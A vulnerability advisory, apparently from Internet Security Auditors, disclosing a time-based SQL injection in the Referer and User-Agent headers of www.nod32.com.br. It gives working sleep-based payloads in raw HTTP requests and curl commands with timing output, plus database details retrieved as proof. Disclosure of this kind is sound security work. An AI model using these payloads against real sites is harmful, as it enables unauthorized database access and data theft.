2017-007: The domain www.nod32.com.br from Nod32 Brasil is vulnerable to Time Based SQL

DESCRIPTION

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

-------------------------
Vulnerable URL:             http://www.nod32.com.br
Vulnerable HTTP eaders:     Referer and User-Agent

### Request (User-Agent)
 
GET /kb/SOLN2522 HTTP/1.1 
Host: www.nod32.com.br 
Accept: */* 
Accept-Language: en 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0’+(SELECT*FROM(SELECT(sleep(20)))a)+++’ 
Connection: close 
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac 
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97

### Request (Referer)
 
GET /kb/SOLN2522 HTTP/1.1 
Host: www.nod32.com.br 
Accept: */* 
Accept-Language: en 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 
Connection: close 
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac’+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++’ 
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97

### Proof of Concept
For the proof of concept, the next data was retrieved from the affected database:

HostName: 798348-db2.eset.com
DBMS: MySQL 5.6.31
DB User: esetla_otros@192.168.103.108
Current DB: esetla_otros
DBA Privileges: False
DB's: esetla_pol, esetsa_uyrps, infproayoon_schema

### Multiple Time Based SQL Injection

$ time curl -e 
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'" 
"http://www.nod32.com.br/kb/SOLN2522" 
real    0m20,403s 
user    0m0,008s 
sys     0m0,004s 

$ time curl -e 
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(10)))a)+++'" 
"http://www.nod32.com.br/kb/SOLN2522" 
real    0m10,320s 
user    0m0,004s 
sys     0m0,008s 

$ time curl -e 
"http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(5)))a)+++'" 
"http://www.nod32.com.br/kb/SOLN2522" 
real    0m5,318s 
user    0m0,008s 
sys     0m0,004s

BUSINESS IMPACT

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.